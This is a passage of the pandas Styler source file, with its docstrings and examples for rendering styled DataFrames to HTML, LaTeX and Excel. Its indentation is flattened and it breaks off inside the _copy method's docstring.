import pandas as pd
from pandas import (
IndexSlice,
RangeIndex,
)
import pandas.core.common as com
from pandas.core.frame import (
DataFrame,
Series,
)
from pandas.core.generic import NDFrame
from pandas.core.shared_docs import _shared_docs
from pandas.io.formats.format import save_to_buffer
jinja2 = import_optional_dependency("jinja2", extra="DataFrame.style requires jinja2.")
from pandas.io.formats.style_render import (
CSSProperties,
CSSStyles,
ExtFormatter,
StylerRenderer,
Subset,
Tooltips,
format_table_styles,
maybe_convert_css_to_tuples,
non_reducing_slice,
refactor_levels,
)
try:
import matplotlib as mpl
import matplotlib.pyplot as plt
has_mpl = True
except ImportError:
has_mpl = False
no_mpl_message = "{0} requires matplotlib."
@contextmanager
def _mpl(func: Callable):
if has_mpl:
yield plt, mpl
else:
raise ImportError(no_mpl_message.format(func.__name__))
####
# Shared Doc Strings
subset = """
subset : label, array-like, IndexSlice, optional
A valid 2d input to `DataFrame.loc[<subset>]`, or, in the case of a 1d input
or single key, to `DataFrame.loc[:, <subset>]` where the columns are
prioritised, to limit ``data`` to *before* applying the function.
"""
props = """
props : str, default None
CSS properties to use for highlighting. If ``props`` is given, ``color``
is not used.
"""
#
###
class Styler(StylerRenderer):
r"""
Helps style a DataFrame or Series according to the data with HTML and CSS.
Parameters
----------
data : Series or DataFrame
Data to be styled - either a Series or DataFrame.
precision : int, optional
Precision to round floats to. If not given defaults to
``pandas.options.styler.format.precision``.
.. versionchanged:: 1.4.0
table_styles : list-like, default None
List of {selector: (attr, value)} dicts; see Notes.
uuid : str, default None
A unique identifier to avoid CSS collisions; generated automatically.
caption : str, tuple, default None
String caption to attach to the table. Tuple only used for LaTeX dual captions.
table_attributes : str, default None
Items that show up in the opening ``<table>`` tag
in addition to automatic (by default) id.
cell_ids : bool, default True
If True, each cell will have an ``id`` attribute in their HTML tag.
The ``id`` takes the form ``T_<uuid>_row<num_row>_col<num_col>``
where ``<uuid>`` is the unique identifier, ``<num_row>`` is the row
number and ``<num_col>`` is the column number.
na_rep : str, optional
Representation for missing values.
If ``na_rep`` is None, no special formatting is applied, and falls back to
``pandas.options.styler.format.na_rep``.
.. versionadded:: 1.0.0
uuid_len : int, default 5
If ``uuid`` is not specified, the length of the ``uuid`` to randomly generate
expressed in hex characters, in range [0, 32].
.. versionadded:: 1.2.0
decimal : str, optional
Character used as decimal separator for floats, complex and integers. If not
given uses ``pandas.options.styler.format.decimal``.
.. versionadded:: 1.3.0
thousands : str, optional, default None
Character used as thousands separator for floats, complex and integers. If not
given uses ``pandas.options.styler.format.thousands``.
.. versionadded:: 1.3.0
escape : str, optional
Use 'html' to replace the characters ``&``, ``<``, ``>``, ``'``, and ``"``
in cell display string with HTML-safe sequences.
Use 'latex' to replace the characters ``&``, ``%``, ``$``, ``#``, ``_``,
``{``, ``}``, ``~``, ``^``, and ``\`` in the cell display string with
LaTeX-safe sequences. If not given uses ``pandas.options.styler.format.escape``.
.. versionadded:: 1.3.0
formatter : str, callable, dict, optional
Object to define how values are displayed. See ``Styler.format``. If not given
uses ``pandas.options.styler.format.formatter``.
.. versionadded:: 1.4.0
Attributes
----------
env : Jinja2 jinja2.Environment
template_html : Jinja2 Template
template_html_table : Jinja2 Template
template_html_style : Jinja2 Template
template_latex : Jinja2 Template
loader : Jinja2 Loader
See Also
--------
DataFrame.style : Return a Styler object containing methods for building
a styled HTML representation for the DataFrame.
Notes
-----
Most styling will be done by passing style functions into
``Styler.apply`` or ``Styler.applymap``. Style functions should
return values with strings containing CSS ``'attr: value'`` that will
be applied to the indicated cells.
If using in the Jupyter notebook, Styler has defined a ``_repr_html_``
to automatically render itself. Otherwise call Styler.to_html to get
the generated HTML.
CSS classes are attached to the generated HTML
* Index and Column names include ``index_name`` and ``level<k>``
where `k` is its level in a MultiIndex
* Index label cells include
* ``row_heading``
* ``row<n>`` where `n` is the numeric position of the row
* ``level<k>`` where `k` is the level in a MultiIndex
* Column label cells include
* ``col_heading``
* ``col<n>`` where `n` is the numeric position of the column
* ``level<k>`` where `k` is the level in a MultiIndex
* Blank cells include ``blank``
* Data cells include ``data``
* Trimmed cells include ``col_trim`` or ``row_trim``.
Any, or all, or these classes can be renamed by using the ``css_class_names``
argument in ``Styler.set_table_classes``, giving a value such as
*{"row": "MY_ROW_CLASS", "col_trim": "", "row_trim": ""}*.
"""
def __init__(
self,
data: DataFrame | Series,
precision: int | None = None,
table_styles: CSSStyles | None = None,
uuid: str | None = None,
caption: str | tuple | None = None,
table_attributes: str | None = None,
cell_ids: bool = True,
na_rep: str | None = None,
uuid_len: int = 5,
decimal: str | None = None,
thousands: str | None = None,
escape: str | None = None,
formatter: ExtFormatter | None = None,
):
super().__init__(
data=data,
uuid=uuid,
uuid_len=uuid_len,
table_styles=table_styles,
table_attributes=table_attributes,
caption=caption,
cell_ids=cell_ids,
precision=precision,
)
# validate ordered args
thousands = thousands or get_option("styler.format.thousands")
decimal = decimal or get_option("styler.format.decimal")
na_rep = na_rep or get_option("styler.format.na_rep")
escape = escape or get_option("styler.format.escape")
formatter = formatter or get_option("styler.format.formatter")
# precision is handled by superclass as default for performance
self.precision = precision # can be removed on set_precision depr cycle
self.na_rep = na_rep # can be removed on set_na_rep depr cycle
self.format(
formatter=formatter,
precision=precision,
na_rep=na_rep,
escape=escape,
decimal=decimal,
thousands=thousands,
)
def _repr_html_(self) -> str | None:
"""
Hooks into Jupyter notebook rich display system, which calls _repr_html_ by
default if an object is returned at the end of a cell.
"""
if get_option("styler.render.repr") == "html":
return self.to_html()
return None
def _repr_latex_(self) -> str | None:
if get_option("styler.render.repr") == "latex":
return self.to_latex()
return None
def render(
self,
sparse_index: bool | None = None,
sparse_columns: bool | None = None,
**kwargs,
) -> str:
"""
Render the ``Styler`` including all applied styles to HTML.
.. deprecated:: 1.4.0
Parameters
----------
sparse_index : bool, optional
Whether to sparsify the display of a hierarchical index. Setting to False
will display each explicit level element in a hierarchical key for each row.
Defaults to ``pandas.options.styler.sparse.index`` value.
sparse_columns : bool, optional
Whether to sparsify the display of a hierarchical index. Setting to False
will display each explicit level element in a hierarchical key for each row.
Defaults to ``pandas.options.styler.sparse.columns`` value.
**kwargs
Any additional keyword arguments are passed
through to ``self.template.render``.
This is useful when you need to provide
additional variables for a custom template.
Returns
-------
rendered : str
The rendered HTML.
Notes
-----
This method is deprecated in favour of ``Styler.to_html``.
Styler objects have defined the ``_repr_html_`` method
which automatically calls ``self.to_html()`` when it's the
last item in a Notebook cell.
When calling ``Styler.render()`` directly, wrap the result in
``IPython.display.HTML`` to view the rendered HTML in the notebook.
Pandas uses the following keys in render. Arguments passed
in ``**kwargs`` take precedence, so think carefully if you want
to override them:
* head
* cellstyle
* body
* uuid
* table_styles
* caption
* table_attributes
"""
warnings.warn(
"this method is deprecated in favour of `Styler.to_html()`",
FutureWarning,
stacklevel=find_stack_level(),
)
if sparse_index is None:
sparse_index = get_option("styler.sparse.index")
if sparse_columns is None:
sparse_columns = get_option("styler.sparse.columns")
return self._render_html(sparse_index, sparse_columns, **kwargs)
def set_tooltips(
self,
ttips: DataFrame,
props: CSSProperties | None = None,
css_class: str | None = None,
) -> Styler:
"""
Set the DataFrame of strings on ``Styler`` generating ``:hover`` tooltips.
These string based tooltips are only applicable to ``<td>`` HTML elements,
and cannot be used for column or index headers.
.. versionadded:: 1.3.0
Parameters
----------
ttips : DataFrame
DataFrame containing strings that will be translated to tooltips, mapped
by identical column and index values that must exist on the underlying
Styler data. None, NaN values, and empty strings will be ignored and
not affect the rendered HTML.
props : list-like or str, optional
List of (attr, value) tuples or a valid CSS string. If ``None`` adopts
the internal default values described in notes.
css_class : str, optional
Name of the tooltip class used in CSS, should conform to HTML standards.
Only useful if integrating tooltips with external CSS. If ``None`` uses the
internal default value 'pd-t'.
Returns
-------
self : Styler
Notes
-----
Tooltips are created by adding `<span class="pd-t"></span>` to each data cell
and then manipulating the table level CSS to attach pseudo hover and pseudo
after selectors to produce the required the results.
The default properties for the tooltip CSS class are:
- visibility: hidden
- position: absolute
- z-index: 1
- background-color: black
- color: white
- transform: translate(-20px, -20px)
The property 'visibility: hidden;' is a key prerequisite to the hover
functionality, and should always be included in any manual properties
specification, using the ``props`` argument.
Tooltips are not designed to be efficient, and can add large amounts of
additional HTML for larger tables, since they also require that ``cell_ids``
is forced to `True`.
Examples
--------
Basic application
>>> df = pd.DataFrame(data=[[0, 1], [2, 3]])
>>> ttips = pd.DataFrame(
... data=[["Min", ""], [np.nan, "Max"]], columns=df.columns, index=df.index
... )
>>> s = df.style.set_tooltips(ttips).to_html()
Optionally controlling the tooltip visual display
>>> df.style.set_tooltips(ttips, css_class='tt-add', props=[
... ('visibility', 'hidden'),
... ('position', 'absolute'),
... ('z-index', 1)]) # doctest: +SKIP
>>> df.style.set_tooltips(ttips, css_class='tt-add',
... props='visibility:hidden; position:absolute; z-index:1;')
... # doctest: +SKIP
"""
if not self.cell_ids:
# tooltips not optimised for individual cell check. requires reasonable
# redesign and more extensive code for a feature that might be rarely used.
raise NotImplementedError(
"Tooltips can only render with 'cell_ids' is True."
)
if not ttips.index.is_unique or not ttips.columns.is_unique:
raise KeyError(
"Tooltips render only if `ttips` has unique index and columns."
)
if self.tooltips is None: # create a default instance if necessary
self.tooltips = Tooltips()
self.tooltips.tt_data = ttips
if props:
self.tooltips.class_properties = props
if css_class:
self.tooltips.class_name = css_class
return self
@doc(
NDFrame.to_excel,
klass="Styler",
storage_options=_shared_docs["storage_options"],
)
def to_excel(
self,
excel_writer,
sheet_name: str = "Sheet1",
na_rep: str = "",
float_format: str | None = None,
columns: Sequence[Hashable] | None = None,
header: Sequence[Hashable] | bool = True,
index: bool = True,
index_label: IndexLabel | None = None,
startrow: int = 0,
startcol: int = 0,
engine: str | None = None,
merge_cells: bool = True,
encoding: str | None = None,
inf_rep: str = "inf",
verbose: bool = True,
freeze_panes: tuple[int, int] | None = None,
) -> None:
from pandas.io.formats.excel import ExcelFormatter
formatter = ExcelFormatter(
self,
na_rep=na_rep,
cols=columns,
header=header,
float_format=float_format,
index=index,
index_label=index_label,
merge_cells=merge_cells,
inf_rep=inf_rep,
)
formatter.write(
excel_writer,
sheet_name=sheet_name,
startrow=startrow,
startcol=startcol,
freeze_panes=freeze_panes,
engine=engine,
)
def to_latex(
self,
buf: FilePath | WriteBuffer[str] | None = None,
*,
column_format: str | None = None,
position: str | None = None,
position_float: str | None = None,
hrules: bool | None = None,
label: str | None = None,
caption: str | tuple | None = None,
sparse_index: bool | None = None,
sparse_columns: bool | None = None,
multirow_align: str | None = None,
multicol_align: str | None = None,
siunitx: bool = False,
environment: str | None = None,
encoding: str | None = None,
convert_css: bool = False,
):
r"""
Write Styler to a file, buffer or string in LaTeX format.
.. versionadded:: 1.3.0
Parameters
----------
buf : str, path object, file-like object, or None, default None
String, path object (implementing ``os.PathLike[str]``), or file-like
object implementing a string ``write()`` function. If None, the result is
returned as a string.
column_format : str, optional
The LaTeX column specification placed in location:
\\begin{tabular}{<column_format>}
Defaults to 'l' for index and
non-numeric data columns, and, for numeric data columns,
to 'r' by default, or 'S' if ``siunitx`` is ``True``.
position : str, optional
The LaTeX positional argument (e.g. 'h!') for tables, placed in location:
``\\begin{table}[<position>]``.
position_float : {"centering", "raggedleft", "raggedright"}, optional
The LaTeX float command placed in location:
\\begin{table}[<position>]
\\<position_float>
Cannot be used if ``environment`` is "longtable".
hrules : bool
Set to `True` to add \\toprule, \\midrule and \\bottomrule from the
{booktabs} LaTeX package.
Defaults to ``pandas.options.styler.latex.hrules``, which is `False`.
.. versionchanged:: 1.4.0
label : str, optional
The LaTeX label included as: \\label{<label>}.
This is used with \\ref{<label>} in the main .tex file.
caption : str, tuple, optional
If string, the LaTeX table caption included as: \\caption{<caption>}.
If tuple, i.e ("full caption", "short caption"), the caption included
as: \\caption[<caption[1]>]{<caption[0]>}.
sparse_index : bool, optional
Whether to sparsify the display of a hierarchical index. Setting to False
will display each explicit level element in a hierarchical key for each row.
Defaults to ``pandas.options.styler.sparse.index``, which is `True`.
sparse_columns : bool, optional
Whether to sparsify the display of a hierarchical index. Setting to False
will display each explicit level element in a hierarchical key for each
column. Defaults to ``pandas.options.styler.sparse.columns``, which
is `True`.
multirow_align : {"c", "t", "b", "naive"}, optional
If sparsifying hierarchical MultiIndexes whether to align text centrally,
at the top or bottom using the multirow package. If not given defaults to
``pandas.options.styler.latex.multirow_align``, which is `"c"`.
If "naive" is given renders without multirow.
.. versionchanged:: 1.4.0
multicol_align : {"r", "c", "l", "naive-l", "naive-r"}, optional
If sparsifying hierarchical MultiIndex columns whether to align text at
the left, centrally, or at the right. If not given defaults to
``pandas.options.styler.latex.multicol_align``, which is "r".
If a naive option is given renders without multicol.
Pipe decorators can also be added to non-naive values to draw vertical
rules, e.g. "\|r" will draw a rule on the left side of right aligned merged
cells.
.. versionchanged:: 1.4.0
siunitx : bool, default False
Set to ``True`` to structure LaTeX compatible with the {siunitx} package.
environment : str, optional
If given, the environment that will replace 'table' in ``\\begin{table}``.
If 'longtable' is specified then a more suitable template is
rendered. If not given defaults to
``pandas.options.styler.latex.environment``, which is `None`.
.. versionadded:: 1.4.0
encoding : str, optional
Character encoding setting. Defaults
to ``pandas.options.styler.render.encoding``, which is "utf-8".
convert_css : bool, default False
Convert simple cell-styles from CSS to LaTeX format. Any CSS not found in
conversion table is dropped. A style can be forced by adding option
`--latex`. See notes.
Returns
-------
str or None
If `buf` is None, returns the result as a string. Otherwise returns `None`.
See Also
--------
Styler.format: Format the text display value of cells.
Notes
-----
**Latex Packages**
For the following features we recommend the following LaTeX inclusions:
===================== ==========================================================
Feature Inclusion
===================== ==========================================================
sparse columns none: included within default {tabular} environment
sparse rows \\usepackage{multirow}
hrules \\usepackage{booktabs}
colors \\usepackage[table]{xcolor}
siunitx \\usepackage{siunitx}
bold (with siunitx) | \\usepackage{etoolbox}
| \\robustify\\bfseries
| \\sisetup{detect-all = true} *(within {document})*
italic (with siunitx) | \\usepackage{etoolbox}
| \\robustify\\itshape
| \\sisetup{detect-all = true} *(within {document})*
environment \\usepackage{longtable} if arg is "longtable"
| or any other relevant environment package
hyperlinks \\usepackage{hyperref}
===================== ==========================================================
**Cell Styles**
LaTeX styling can only be rendered if the accompanying styling functions have
been constructed with appropriate LaTeX commands. All styling
functionality is built around the concept of a CSS ``(<attribute>, <value>)``
pair (see `Table Visualization <../../user_guide/style.ipynb>`_), and this
should be replaced by a LaTeX
``(<command>, <options>)`` approach. Each cell will be styled individually
using nested LaTeX commands with their accompanied options.
For example the following code will highlight and bold a cell in HTML-CSS:
>>> df = pd.DataFrame([[1,2], [3,4]])
>>> s = df.style.highlight_max(axis=None,
... props='background-color:red; font-weight:bold;')
>>> s.to_html() # doctest: +SKIP
The equivalent using LaTeX only commands is the following:
>>> s = df.style.highlight_max(axis=None,
... props='cellcolor:{red}; bfseries: ;')
>>> s.to_latex() # doctest: +SKIP
Internally these structured LaTeX ``(<command>, <options>)`` pairs
are translated to the
``display_value`` with the default structure:
``\<command><options> <display_value>``.
Where there are multiple commands the latter is nested recursively, so that
the above example highlighed cell is rendered as
``\cellcolor{red} \bfseries 4``.
Occasionally this format does not suit the applied command, or
combination of LaTeX packages that is in use, so additional flags can be
added to the ``<options>``, within the tuple, to result in different
positions of required braces (the **default** being the same as ``--nowrap``):
=================================== ============================================
Tuple Format Output Structure
=================================== ============================================
(<command>,<options>) \\<command><options> <display_value>
(<command>,<options> ``--nowrap``) \\<command><options> <display_value>
(<command>,<options> ``--rwrap``) \\<command><options>{<display_value>}
(<command>,<options> ``--wrap``) {\\<command><options> <display_value>}
(<command>,<options> ``--lwrap``) {\\<command><options>} <display_value>
(<command>,<options> ``--dwrap``) {\\<command><options>}{<display_value>}
=================================== ============================================
For example the `textbf` command for font-weight
should always be used with `--rwrap` so ``('textbf', '--rwrap')`` will render a
working cell, wrapped with braces, as ``\textbf{<display_value>}``.
A more comprehensive example is as follows:
>>> df = pd.DataFrame([[1, 2.2, "dogs"], [3, 4.4, "cats"], [2, 6.6, "cows"]],
... index=["ix1", "ix2", "ix3"],
... columns=["Integers", "Floats", "Strings"])
>>> s = df.style.highlight_max(
... props='cellcolor:[HTML]{FFFF00}; color:{red};'
... 'textit:--rwrap; textbf:--rwrap;'
... )
>>> s.to_latex() # doctest: +SKIP
.. figure:: ../../_static/style/latex_1.png
**Table Styles**
Internally Styler uses its ``table_styles`` object to parse the
``column_format``, ``position``, ``position_float``, and ``label``
input arguments. These arguments are added to table styles in the format:
.. code-block:: python
set_table_styles([
{"selector": "column_format", "props": f":{column_format};"},
{"selector": "position", "props": f":{position};"},
{"selector": "position_float", "props": f":{position_float};"},
{"selector": "label", "props": f":{{{label.replace(':','§')}}};"}
], overwrite=False)
Exception is made for the ``hrules`` argument which, in fact, controls all three
commands: ``toprule``, ``bottomrule`` and ``midrule`` simultaneously. Instead of
setting ``hrules`` to ``True``, it is also possible to set each
individual rule definition, by manually setting the ``table_styles``,
for example below we set a regular ``toprule``, set an ``hline`` for
``bottomrule`` and exclude the ``midrule``:
.. code-block:: python
set_table_styles([
{'selector': 'toprule', 'props': ':toprule;'},
{'selector': 'bottomrule', 'props': ':hline;'},
], overwrite=False)
If other ``commands`` are added to table styles they will be detected, and
positioned immediately above the '\\begin{tabular}' command. For example to
add odd and even row coloring, from the {colortbl} package, in format
``\rowcolors{1}{pink}{red}``, use:
.. code-block:: python
set_table_styles([
{'selector': 'rowcolors', 'props': ':{1}{pink}{red};'}
], overwrite=False)
A more comprehensive example using these arguments is as follows:
>>> df.columns = pd.MultiIndex.from_tuples([
... ("Numeric", "Integers"),
... ("Numeric", "Floats"),
... ("Non-Numeric", "Strings")
... ])
>>> df.index = pd.MultiIndex.from_tuples([
... ("L0", "ix1"), ("L0", "ix2"), ("L1", "ix3")
... ])
>>> s = df.style.highlight_max(
... props='cellcolor:[HTML]{FFFF00}; color:{red}; itshape:; bfseries:;'
... )
>>> s.to_latex(
... column_format="rrrrr", position="h", position_float="centering",
... hrules=True, label="table:5", caption="Styled LaTeX Table",
... multirow_align="t", multicol_align="r"
... ) # doctest: +SKIP
.. figure:: ../../_static/style/latex_2.png
**Formatting**
To format values :meth:`Styler.format` should be used prior to calling
`Styler.to_latex`, as well as other methods such as :meth:`Styler.hide_index`
or :meth:`Styler.hide_columns`, for example:
>>> s.clear()
>>> s.table_styles = []
>>> s.caption = None
>>> s.format({
... ("Numeric", "Integers"): '\${}',
... ("Numeric", "Floats"): '{:.3f}',
... ("Non-Numeric", "Strings"): str.upper
... }) # doctest: +SKIP
Numeric Non-Numeric
Integers Floats Strings
L0 ix1 $1 2.200 DOGS
ix2 $3 4.400 CATS
L1 ix3 $2 6.600 COWS
>>> s.to_latex() # doctest: +SKIP
\begin{tabular}{llrrl}
{} & {} & \multicolumn{2}{r}{Numeric} & {Non-Numeric} \\
{} & {} & {Integers} & {Floats} & {Strings} \\
\multirow[c]{2}{*}{L0} & ix1 & \\$1 & 2.200 & DOGS \\
& ix2 & \$3 & 4.400 & CATS \\
L1 & ix3 & \$2 & 6.600 & COWS \\
\end{tabular}
**CSS Conversion**
This method can convert a Styler constructured with HTML-CSS to LaTeX using
the following limited conversions.
================== ==================== ============= ==========================
CSS Attribute CSS value LaTeX Command LaTeX Options
================== ==================== ============= ==========================
font-weight | bold | bfseries
| bolder | bfseries
font-style | italic | itshape
| oblique | slshape
background-color | red cellcolor | {red}--lwrap
| #fe01ea | [HTML]{FE01EA}--lwrap
| #f0e | [HTML]{FF00EE}--lwrap
| rgb(128,255,0) | [rgb]{0.5,1,0}--lwrap
| rgba(128,0,0,0.5) | [rgb]{0.5,0,0}--lwrap
| rgb(25%,255,50%) | [rgb]{0.25,1,0.5}--lwrap
color | red color | {red}
| #fe01ea | [HTML]{FE01EA}
| #f0e | [HTML]{FF00EE}
| rgb(128,255,0) | [rgb]{0.5,1,0}
| rgba(128,0,0,0.5) | [rgb]{0.5,0,0}
| rgb(25%,255,50%) | [rgb]{0.25,1,0.5}
================== ==================== ============= ==========================
It is also possible to add user-defined LaTeX only styles to a HTML-CSS Styler
using the ``--latex`` flag, and to add LaTeX parsing options that the
converter will detect within a CSS-comment.
>>> df = pd.DataFrame([[1]])
>>> df.style.set_properties(
... **{"font-weight": "bold /* --dwrap */", "Huge": "--latex--rwrap"}
... ).to_latex(convert_css=True) # doctest: +SKIP
\begin{tabular}{lr}
{} & {0} \\
0 & {\bfseries}{\Huge{1}} \\
\end{tabular}
"""
obj = self._copy(deepcopy=True) # manipulate table_styles on obj, not self
table_selectors = (
[style["selector"] for style in self.table_styles]
if self.table_styles is not None
else []
)
if column_format is not None:
# add more recent setting to table_styles
obj.set_table_styles(
[{"selector": "column_format", "props": f":{column_format}"}],
overwrite=False,
)
elif "column_format" in table_selectors:
pass # adopt what has been previously set in table_styles
else:
# create a default: set float, complex, int cols to 'r' ('S'), index to 'l'
_original_columns = self.data.columns
self.data.columns = RangeIndex(stop=len(self.data.columns))
numeric_cols = self.data._get_numeric_data().columns.to_list()
self.data.columns = _original_columns
column_format = ""
for level in range(self.index.nlevels):
column_format += "" if self.hide_index_[level] else "l"
for ci, _ in enumerate(self.data.columns):
if ci not in self.hidden_columns:
column_format += (
("r" if not siunitx else "S") if ci in numeric_cols else "l"
)
obj.set_table_styles(
[{"selector": "column_format", "props": f":{column_format}"}],
overwrite=False,
)
if position:
obj.set_table_styles(
[{"selector": "position", "props": f":{position}"}],
overwrite=False,
)
if position_float:
if environment == "longtable":
raise ValueError(
"`position_float` cannot be used in 'longtable' `environment`"
)
if position_float not in ["raggedright", "raggedleft", "centering"]:
raise ValueError(
f"`position_float` should be one of "
f"'raggedright', 'raggedleft', 'centering', "
f"got: '{position_float}'"
)
obj.set_table_styles(
[{"selector": "position_float", "props": f":{position_float}"}],
overwrite=False,
)
hrules = get_option("styler.latex.hrules") if hrules is None else hrules
if hrules:
obj.set_table_styles(
[
{"selector": "toprule", "props": ":toprule"},
{"selector": "midrule", "props": ":midrule"},
{"selector": "bottomrule", "props": ":bottomrule"},
],
overwrite=False,
)
if label:
obj.set_table_styles(
[{"selector": "label", "props": f":{{{label.replace(':', '§')}}}"}],
overwrite=False,
)
if caption:
obj.set_caption(caption)
if sparse_index is None:
sparse_index = get_option("styler.sparse.index")
if sparse_columns is None:
sparse_columns = get_option("styler.sparse.columns")
environment = environment or get_option("styler.latex.environment")
multicol_align = multicol_align or get_option("styler.latex.multicol_align")
multirow_align = multirow_align or get_option("styler.latex.multirow_align")
latex = obj._render_latex(
sparse_index=sparse_index,
sparse_columns=sparse_columns,
multirow_align=multirow_align,
multicol_align=multicol_align,
environment=environment,
convert_css=convert_css,
siunitx=siunitx,
)
encoding = encoding or get_option("styler.render.encoding")
return save_to_buffer(
latex, buf=buf, encoding=None if buf is None else encoding
)
def to_html(
self,
buf: FilePath | WriteBuffer[str] | None = None,
*,
table_uuid: str | None = None,
table_attributes: str | None = None,
sparse_index: bool | None = None,
sparse_columns: bool | None = None,
bold_headers: bool = False,
caption: str | None = None,
max_rows: int | None = None,
max_columns: int | None = None,
encoding: str | None = None,
doctype_html: bool = False,
exclude_styles: bool = False,
**kwargs,
):
"""
Write Styler to a file, buffer or string in HTML-CSS format.
.. versionadded:: 1.3.0
Parameters
----------
buf : str, path object, file-like object, or None, default None
String, path object (implementing ``os.PathLike[str]``), or file-like
object implementing a string ``write()`` function. If None, the result is
returned as a string.
table_uuid : str, optional
Id attribute assigned to the <table> HTML element in the format:
``<table id="T_<table_uuid>" ..>``
If not given uses Styler's initially assigned value.
table_attributes : str, optional
Attributes to assign within the `<table>` HTML element in the format:
``<table .. <table_attributes> >``
If not given defaults to Styler's preexisting value.
sparse_index : bool, optional
Whether to sparsify the display of a hierarchical index. Setting to False
will display each explicit level element in a hierarchical key for each row.
Defaults to ``pandas.options.styler.sparse.index`` value.
.. versionadded:: 1.4.0
sparse_columns : bool, optional
Whether to sparsify the display of a hierarchical index. Setting to False
will display each explicit level element in a hierarchical key for each
column. Defaults to ``pandas.options.styler.sparse.columns`` value.
.. versionadded:: 1.4.0
bold_headers : bool, optional
Adds "font-weight: bold;" as a CSS property to table style header cells.
.. versionadded:: 1.4.0
caption : str, optional
Set, or overwrite, the caption on Styler before rendering.
.. versionadded:: 1.4.0
max_rows : int, optional
The maximum number of rows that will be rendered. Defaults to
``pandas.options.styler.render.max_rows/max_columns``.
.. versionadded:: 1.4.0
max_columns : int, optional
The maximum number of columns that will be rendered. Defaults to
``pandas.options.styler.render.max_columns``, which is None.
Rows and columns may be reduced if the number of total elements is
large. This value is set to ``pandas.options.styler.render.max_elements``,
which is 262144 (18 bit browser rendering).
.. versionadded:: 1.4.0
encoding : str, optional
Character encoding setting for file output, and HTML meta tags.
Defaults to ``pandas.options.styler.render.encoding`` value of "utf-8".
doctype_html : bool, default False
Whether to output a fully structured HTML file including all
HTML elements, or just the core ``<style>`` and ``<table>`` elements.
exclude_styles : bool, default False
Whether to include the ``<style>`` element and all associated element
``class`` and ``id`` identifiers, or solely the ``<table>`` element without
styling identifiers.
**kwargs
Any additional keyword arguments are passed through to the jinja2
``self.template.render`` process. This is useful when you need to provide
additional variables for a custom template.
Returns
-------
str or None
If `buf` is None, returns the result as a string. Otherwise returns `None`.
See Also
--------
DataFrame.to_html: Write a DataFrame to a file, buffer or string in HTML format.
"""
obj = self._copy(deepcopy=True) # manipulate table_styles on obj, not self
if table_uuid:
obj.set_uuid(table_uuid)
if table_attributes:
obj.set_table_attributes(table_attributes)
if sparse_index is None:
sparse_index = get_option("styler.sparse.index")
if sparse_columns is None:
sparse_columns = get_option("styler.sparse.columns")
if bold_headers:
obj.set_table_styles(
[{"selector": "th", "props": "font-weight: bold;"}], overwrite=False
)
if caption is not None:
obj.set_caption(caption)
encoding = encoding or get_option("styler.render.encoding")
# Build HTML string..
html = obj._render_html(
sparse_index=sparse_index,
sparse_columns=sparse_columns,
max_rows=max_rows,
max_cols=max_columns,
exclude_styles=exclude_styles,
encoding=encoding,
doctype_html=doctype_html,
**kwargs,
)
return save_to_buffer(
html, buf=buf, encoding=(encoding if buf is not None else None)
)
def set_td_classes(self, classes: DataFrame) -> Styler:
"""
Set the DataFrame of strings added to the ``class`` attribute of ``<td>``
HTML elements.
Parameters
----------
classes : DataFrame
DataFrame containing strings that will be translated to CSS classes,
mapped by identical column and index key values that must exist on the
underlying Styler data. None, NaN values, and empty strings will
be ignored and not affect the rendered HTML.
Returns
-------
self : Styler
See Also
--------
Styler.set_table_styles: Set the table styles included within the ``<style>``
HTML element.
Styler.set_table_attributes: Set the table attributes added to the ``<table>``
HTML element.
Notes
-----
Can be used in combination with ``Styler.set_table_styles`` to define an
internal CSS solution without reference to external CSS files.
Examples
--------
>>> df = pd.DataFrame(data=[[1, 2, 3], [4, 5, 6]], columns=["A", "B", "C"])
>>> classes = pd.DataFrame([
... ["min-val red", "", "blue"],
... ["red", None, "blue max-val"]
... ], index=df.index, columns=df.columns)
>>> df.style.set_td_classes(classes) # doctest: +SKIP
Using `MultiIndex` columns and a `classes` `DataFrame` as a subset of the
underlying,
>>> df = pd.DataFrame([[1,2],[3,4]], index=["a", "b"],
... columns=[["level0", "level0"], ["level1a", "level1b"]])
>>> classes = pd.DataFrame(["min-val"], index=["a"],
... columns=[["level0"],["level1a"]])
>>> df.style.set_td_classes(classes) # doctest: +SKIP
Form of the output with new additional css classes,
>>> df = pd.DataFrame([[1]])
>>> css = pd.DataFrame([["other-class"]])
>>> s = Styler(df, uuid="_", cell_ids=False).set_td_classes(css)
>>> s.hide_index().to_html() # doctest: +SKIP
'<style type="text/css"></style>'
'<table id="T__">'
' <thead>'
' <tr><th class="col_heading level0 col0" >0</th></tr>'
' </thead>'
' <tbody>'
' <tr><td class="data row0 col0 other-class" >1</td></tr>'
' </tbody>'
'</table>'
"""
if not classes.index.is_unique or not classes.columns.is_unique:
raise KeyError(
"Classes render only if `classes` has unique index and columns."
)
classes = classes.reindex_like(self.data)
for r, row_tup in enumerate(classes.itertuples()):
for c, value in enumerate(row_tup[1:]):
if not (pd.isna(value) or value == ""):
self.cell_context[(r, c)] = str(value)
return self
def _update_ctx(self, attrs: DataFrame) -> None:
"""
Update the state of the ``Styler`` for data cells.
Collects a mapping of {index_label: [('<property>', '<value>'), ..]}.
Parameters
----------
attrs : DataFrame
should contain strings of '<property>: <value>;<prop2>: <val2>'
Whitespace shouldn't matter and the final trailing ';' shouldn't
matter.
"""
if not self.index.is_unique or not self.columns.is_unique:
raise KeyError(
"`Styler.apply` and `.applymap` are not compatible "
"with non-unique index or columns."
)
for cn in attrs.columns:
j = self.columns.get_loc(cn)
ser = attrs[cn]
for rn, c in ser.items():
if not c or pd.isna(c):
continue
css_list = maybe_convert_css_to_tuples(c)
i = self.index.get_loc(rn)
self.ctx[(i, j)].extend(css_list)
def _update_ctx_header(self, attrs: DataFrame, axis: int) -> None:
"""
Update the state of the ``Styler`` for header cells.
Collects a mapping of {index_label: [('<property>', '<value>'), ..]}.
Parameters
----------
attrs : Series
Should contain strings of '<property>: <value>;<prop2>: <val2>', and an
integer index.
Whitespace shouldn't matter and the final trailing ';' shouldn't
matter.
axis : int
Identifies whether the ctx object being updated is the index or columns
"""
for j in attrs.columns:
ser = attrs[j]
for i, c in ser.items():
if not c:
continue
css_list = maybe_convert_css_to_tuples(c)
if axis == 0:
self.ctx_index[(i, j)].extend(css_list)
else:
self.ctx_columns[(j, i)].extend(css_list)
def _copy(self, deepcopy: bool = False) -> Styler:
"""
Copies a Styler, allowing for deepcopy or shallow copy
Copying a Styler aims to recreate a new Styler object which contains the same
data and styles as the original.
Data dependent attributes [copied and NOT exported]:
- formatting (._display_funcs)
- hidden index values or column values (.hidden_rows, .hidden_columns)
- tooltips
